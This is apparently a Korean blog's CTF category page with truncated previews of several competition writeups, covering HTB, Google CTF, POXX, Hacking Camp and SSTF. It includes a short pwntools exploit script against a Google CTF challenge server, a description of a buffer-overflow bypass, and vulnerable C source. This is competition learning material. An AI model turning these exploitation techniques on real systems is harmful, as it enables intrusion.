CTF (5) 썸네일형 리스트형 2023 HTB CTF Writeup Ⅰ. 개요(KOR 기준) 07.14 22:00 ~ 07.17 05:003문제 CLEARⅡ. 풀이1. [Reversing] DrillingPlatform (1) 문제 지문Welcome to the latest and greatest in Vitralium mining technology. Our newest rig can penetrate depths never before reached! Unfortunately, we haven't yet been able to locate any. Can you get into the workings of the machine and find out where we need to drill?(2) 풀이주어진 바이너리를 디버깅하여 string만 확인해보면 flag를.. 2023 Google CTF writeup (Pwnable) Ⅰ. 개요2023 ~ 진행pwnable 문제 중 2문제 CLEAR Ⅱ. Writeupfrom pwn import *p = remote(b"wfw1.2023.ctfcompetition.com", 1337)#p = process(b"./chal")p.recvuntil(b"shot.\\n")input(">")BaseAddr = int(p.recvuntil(b"-")[:-1].decode('ascii'), 16)FlagAddr = BaseAddr + 0x21E0print(hex(FlagAddr))p.recvuntil(b"expire\\n")payload = hex(FlagAddr).encode()payload += b" 50"print(payload)p.send(payload)p.interactive() 2022 POXX 예선 & 본선 writeup (pwnable, rev) Ⅰ. 총평 Power Of XX 대회로, 여성들만 참여할 수 있는 해킹대회이다. 이번 대회에는 해킹캠프에서 만났던 숭실대 친구 2명과 함께 참가하게 되었다. 2명 친구들은 web을 위주로 문제를 풀었고 나는 pwnable문제를 풀었다. 내가 팀장으로 "프롬하츠"라는 팀명으로 출전하였다. 본선에서 몇시간동안 공동 2위를 하다가, 대회 마치기 10분전 4등으로 떨어진 마음 아픈 대회이다.. POXX대회는 쉬운 대회라서, 처음으로 좀 높은 등수를 받을 수 있었던 것 같다 그래도 그동안의 공부를 헛되게 하지 않았구나를 생각하게 해준 대회였다. 10분전 등수가 밀려서 아쉬움은 있지만, 그것 또한 나의 실력임을 인정한다. 이번 대회를 통해, 앞으로 더 열심히 공부에 전념해야겠다는 의욕을 일깨웠다. 내년 대회에서는 .. 2022 Hacking Camp writeup_pwnable 1. Trust me (1) 난이도 : Easy (2) 문제 (3) 풀이 age를 우회한 후, name에 BOF를 발생시켜 read_flag함수를 호출하는 문제이다. age우회 age는 -128면 안되고, -127보다는 작아야 하는 조건문이 존재한다. 이는 디버깅을 하여, 코드를 분석해서 쉽게 우회할 수 있었다. 아래 캡쳐보는 gdb로 디버깅한 사진이다. ①을 보면 0xffffff80이면 안되고, ②을 보면 입력값은 al크기의 값이 0x80인지 확인하고 있다. 따라서, 0xffffff80이 아지만, al이 0x80인 '-3712'값을 age에 넣어주면 우회가 가능하다. name의 BOF취약점 디버깅하여, 확인해보면 ebp-8위치가 func임을 알 수 있다. 위 사진의 ③을 보면 0x25만큼 입력을 받아오.. 2022 SSTF writeup 1. BOF101 (1) 문제 설명 바이너리 파일과 C 코드가 주어진다. bof101.c #include #include #include int printflag(){ char buf[32]; FILE* fp = fopen("/flag", "r"); fread(buf, 1, 32, fp); fclose(fp); printf("%s", buf); return 0; } int main() { int check=0xdeadbeef; char name[140]; printf("printflag()'s addr: %p\n", &printflag); printf("What is your name?\n: "); scanf("%s", name); if (check != 0xdeadbeef){ printf("[Warni.. 이전 1 다음
